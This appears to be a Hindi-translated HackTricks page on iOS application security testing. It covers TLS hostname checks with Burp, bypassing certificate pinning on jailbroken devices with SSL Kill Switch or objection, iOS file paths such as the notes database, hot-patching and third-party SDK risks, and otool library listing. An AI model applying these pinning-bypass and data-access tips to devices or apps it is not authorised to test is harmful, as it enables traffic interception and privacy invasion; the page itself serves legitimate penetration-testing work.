{% content-ref url="burp-configuration-for-ios.md" %} burp-configuration-for-ios.md {% endcontent-ref %}

होस्टनाम चेक

TLS सर्टिफिकेट की सत्यापन करने की एक सामान्य समस्या यह है कि सर्टिफिकेट को एक विश्वसनीय CA द्वारा साइन किया गया है, लेकिन यह नहीं देखा गया है कि सर्टिफिकेट का होस्टनाम वह होस्टनाम है जिसे एक्सेस किया जा रहा है।
इस समस्या की जांच करने के लिए Burp का उपयोग करते हुए, iPhone में Burp CA को विश्वसनीय बनाने के बाद, आप बर्प के साथ एक नया सर्टिफिकेट बना सकते हैं और उसका उपयोग कर सकते हैं। यदि एप्लिकेशन अब भी काम करता है, तो कुछ गलती हो सकती है।

सर्टिफिकेट पिनिंग

यदि कोई एप्लिकेशन सही ढंग से SSL पिनिंग का उपयोग कर रहा है, तो एप्लिकेशन केवल तभी काम करेगा जब सर्टिफिकेट वही होगा जो अपेक्षित है। जब एप्लिकेशन का परीक्षण किया जाता है तो यह एक समस्या हो सकती है क्योंकि Burp अपना सर्टिफिकेट सर्व करेगा।
इस सुरक्षा को उलटने के लिए जेलब्रोकन डिवाइस के अंदर, आप एप्लिकेशन SSL Kill Switch इंस्टॉल कर सकते हैं या Burp Mobile Assistant इंस्टॉल कर सकते हैं।

आप भी objection's ios sslpinning disable का उपयोग कर सकते हैं

विविध

  • /System/Library में आप फोन में सिस्टम एप्लिकेशन द्वारा उपयोग किए जाने वाले फ्रेमवर्क्स पा सकते हैं
  • उपयोगकर्ता द्वारा एप्लिकेशन स्टोर से इंस्टॉल की गई एप्लिकेशनें /User/Applications में स्थित हैं
  • और /User/Library में उपयोगकर्ता स्तर की एप्लिकेशनों द्वारा सहेजे गए डेटा होता है
  • आप /User/Library/Notes/notes.sqlite तक पहुंच सकते हैं ताकि एप्लिकेशन के अंदर सहेजे गए नोट्स पढ़ सकें।
  • इंस्टॉल की गई एप्लिकेशन के फ़ोल्डर के अंदर (/User/Applications/<APP ID>/) आप कुछ दिलचस्प फ़ाइलें पा सकते हैं:
    • iTunesArtwork: एप्लिकेशन द्वारा उपयोग किया जाने वाला आइकन
    • iTunesMetadata.plist: एप्लिकेशन स्टोर में उपयोग के लिए जानकारी
    • /Library/*: प्राथमिकताएं और कैश को संभालता है। /Library/Cache/Snapshots/* में आप एप्लिकेशन को बैकग्राउंड में भेजने से पहले किए गए स्नैपशॉट पा सकते हैं।

हॉट पैचिंग/अनिवार्य अपडेटिंग

डेवलपर अपने एप्लिकेशन की सभी स्थापनाएं तुरंत पैच कर सकते हैं बिना एप्लिकेशन को एप्लिकेशन स्टोर में फिर से सबमिट करने और मंजूरी तक इंतजार करने की आवश्यकता न हो।
इस उद्देश्य के लिए आम तौर पर JSPatch जैसा उपयोग किया जाता है। लेकिन Siren और react-native-appstore-version-checker जैसे अन्य विकल्प भी हैं।
यह एक खतरनाक तंत्र है जिसे दुरुपयोग किया जा सकता है द्वारा दुर्भाग्यपूर्ण तृतीय पक्ष SDKs के द्वारा इसलिए सिफारिश की जाती है कि स्वचालित अपडेटिंग के लिए कौन सा विधि उपयोग किया जा रहा है (यदि कोई) और इसे जांचा जाए। इस उद्देश्य से आप पिछले संस्करण को डाउनलोड करने की कोशिश कर सकते हैं।

तृतीय पक्ष

तृतीय पक्ष SDKs के साथ एक महत्वपूर्ण चुनौती है उनकी कार्यों पर विस्तृत नियंत्रण की कमी। डेवलपरों के सामने एक विकल्प है: या तो SDK को एकीकृत करें और उसकी सभी विशेषताएं स्वीकार करें, सम्भावित सुरक्षा संकटों और गोपनीयता संबंधित चिंताओं के साथ, या पूरी तरह से इसके लाभों को छोड़ दें। अक्सर, डेवलपर इन SDKs के अंदर संकटों को पैच नहीं कर सकते। इसके अतिरिक्त, जैसे ही SDKs समुदाय में विश्वास प्राप्त करते हैं, कुछ मेलवेयर शामिल करने लग सकते हैं।

तृतीय पक्ष SDKs द्वारा प्रदान की जाने वाली सेवाएं उपयोगकर्ता व्यवहार ट्रैकिंग, विज्ञापन प्रदर्शन या उपयोगकर्ता अनुभव में सुधार शामिल हो सकते हैं। हालांकि, यह एक जोखिम भी लाता है क्योंकि डेवलपरों को इन पुस्तकालयों द्वारा निष्पादित कोड के बारे में पूरी तरह से जागरूक नहीं हो सकता, जिससे संभावित गोपनीयता और सुरक्षा संकटों का सामना करना पड़ सकता है। तृतीय पक्ष सेवाओं के साथ साझा की जाने वाली किसी भी जानकारी को अनामिकरण करना चाहिए ताकि व्यक्तिगत पहचानीय जानकारी (PII) का उजागर न हो।

एप्लिकेशन द्वारा उपयोग किए जाने वाली पुस्तकालयों की पहचान के लिए otool कमांड का उपयोग किया जा सकता है। इस उपकरण को एप्लिकेशन और प्रत्येक साझा पुस्तकालय के खिलाफ चलाया जाना चाहिए जिससे अतिरिक्त पुस्तकालयों की खोज की जा सके।

otool -L <application_path>

संदर्भ और अधिक संसाधन


Trickest का उपयोग करें और दुनिया के सबसे उन्नत समुदाय उपकरणों द्वारा संचालित कार्यप्रवाह को आसानी से निर्मित और स्वचालित करें।
आज ही पहुंचें:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

HackTricks का समर्थन करने के अन्य तरीके: